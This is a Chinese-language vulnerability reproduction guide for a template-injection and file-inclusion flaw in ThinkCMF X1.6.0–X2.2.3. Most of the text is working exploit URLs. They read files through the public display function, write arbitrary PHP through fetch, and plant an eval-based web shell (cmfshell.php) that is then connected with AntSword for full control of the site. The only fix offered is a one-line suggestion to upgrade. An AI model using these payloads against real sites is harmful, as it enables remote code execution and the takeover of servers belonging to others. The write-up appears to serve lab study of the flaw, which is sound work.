ThinkCMF文件包含x1.6.0-x2.2.3

漏洞描述:

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。

每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

在ThinkCMF X1.6.0至ThinkCMF X2.2.3之间存在安全漏洞,引起漏洞的最主要的问题是因为fetch函数和display函数是public类型。

fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。

display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。

fetch和display的用法差不多,二者的区别就是display方法直接输出模板文件渲染后的内容,而fetch方法是返回模板文件渲染后的内容。

由于这个代码漏洞,攻击者可以构造恶意url造成文件包含/上传漏洞,向服务器写入任意内容的文件,达到远程代码执行的目的。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.读取readme.md文件

/?a=display&templateFile=README.md

3.构造payload,写入phpinfo函数至test.php文件中

/?a=fetch&templateFile=public/index&prefix=%27%27&content=<php>file_put_contents(%27test.php%27,%27<?php%20phpinfo();%20?>%27)</php>

返回空白页面

4.读取test.php文件,获取phpinfo页面信息

5.上传Getshell文件

/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('cmfshell.php','<?php @eval($_POST[123]); ?>')</php>

6.蚁剑连接,Getshell

http://ip:port/cmfshell.php

借此漏洞攻击者获取到网站的shell权限,控制整个网站,可以进行文件读取和命令执行。

修复建议:

1.升级版本。